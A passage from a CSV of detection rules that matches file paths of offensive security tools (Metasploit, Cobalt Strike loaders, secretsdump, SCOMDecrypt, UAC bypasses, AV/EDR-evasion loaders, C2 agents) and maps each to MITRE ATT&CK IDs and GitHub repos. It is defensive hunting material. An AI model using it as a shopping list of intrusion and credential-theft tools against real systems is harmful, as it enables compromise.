TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/sc_inject/inject/*",".{0,1000}\/sc_inject\/inject\/.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/scan4all.exe*",".{0,1000}\/scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" 
"*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all.rb*",".{0,1000}\/scan4all\.rb.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all/lib/api*",".{0,1000}\/scan4all\/lib\/api.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all/lib/util*",".{0,1000}\/scan4all\/lib\/util.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port 
scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/ScanInterception.ps1*",".{0,1000}\/ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/scanner/discovery*",".{0,1000}\/scanner\/discovery.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/kerberos*",".{0,1000}\/scanner\/kerberos.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/pcanywhere*",".{0,1000}\/scanner\/pcanywhere.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/portscan*",".{0,1000}\/scanner\/portscan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/winrm*",".{0,1000}\/scanner\/winrm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scannerPort.go*",".{0,1000}\/scannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*/scan-network.py*",".{0,1000}\/scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Scans/servers_all_smb*.txt*",".{0,1000}\/Scans\/servers_all_smb.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 
- TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/ScareCrow -I *",".{0,1000}\/ScareCrow\s\-I\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/sccmhunter*",".{0,1000}\/sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" 
"*/schtasksenum/*.*",".{0,1000}\/schtasksenum\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/sc-loader.exe*",".{0,1000}\/sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*/scmuacbypass.cpp*",".{0,1000}\/scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/scmuacbypass.exe*",".{0,1000}\/scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCMUACBypass.git*",".{0,1000}\/SCMUACBypass\.git.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCMUACBypass/*",".{0,1000}\/SCMUACBypass\/.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCOMDecrypt.git*",".{0,1000}\/SCOMDecrypt\.git.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*/ScreenshotInject*",".{0,1000}\/ScreenshotInject.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/script/reuse.py*",".{0,1000}\/script\/reuse\.py.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/scripts/xor.py*",".{0,1000}\/scripts\/xor\.py.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*/ScriptSentry.git*",".{0,1000}\/ScriptSentry\.git.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential 
Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScriptSentry.ps1*",".{0,1000}\/ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScriptSentry.psd1*",".{0,1000}\/ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScriptSentry.psm1*",".{0,1000}\/ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScRunHex.py*",".{0,1000}\/ScRunHex\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*/scshell*",".{0,1000}\/scshell.{0,1000}","offensive_tool_keyword","scshell","SCShell is a fileless Lateral Movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*/scshell.py*",".{0,1000}\/scshell\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/scuffy.py*",".{0,1000}\/scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/sdb-explorer.exe*",".{0,1000}\/sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*/searchsploit*",".{0,1000}\/searchsploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/SeatBelt.exe*",".{0,1000}\/SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Seatbelt.git*",".{0,1000}\/Seatbelt\.git.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*/Seatbelt.txt*",".{0,1000}\/Seatbelt\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Seatbelt/Commands*",".{0,1000}\/Seatbelt\/Commands.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*/seatbelt_json.py*",".{0,1000}\/seatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/SeBackupPrivilege.md*",".{0,1000}\/SeBackupPrivilege\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/secinject.c*",".{0,1000}\/secinject\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*/SecretFinder.git*",".{0,1000}\/SecretFinder\.git.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/secretsdump_*.txt*",".{0,1000}\/secretsdump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 